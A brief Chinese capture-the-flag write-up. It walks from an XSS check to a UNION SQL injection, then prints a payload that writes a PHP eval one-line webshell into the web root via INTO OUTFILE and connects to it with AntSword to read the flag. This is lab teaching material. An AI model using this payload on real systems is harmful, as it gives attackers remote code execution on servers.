1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞
2.有xss大概率也存在sql注入,测试到3的时候发现有回显
3.进一步得出库名
4.要get shell的话我们可以尝试写一句话木马进去,构建payload
key=-1' union select 1,"<?php @eval($_POSTcmd); ?>", 3 into outfile '/var/www/html/1.php'#
5.访问我们写进去的1.php,确认木马已写入
6.打开蚁剑连接
7.在根目录下得到flag
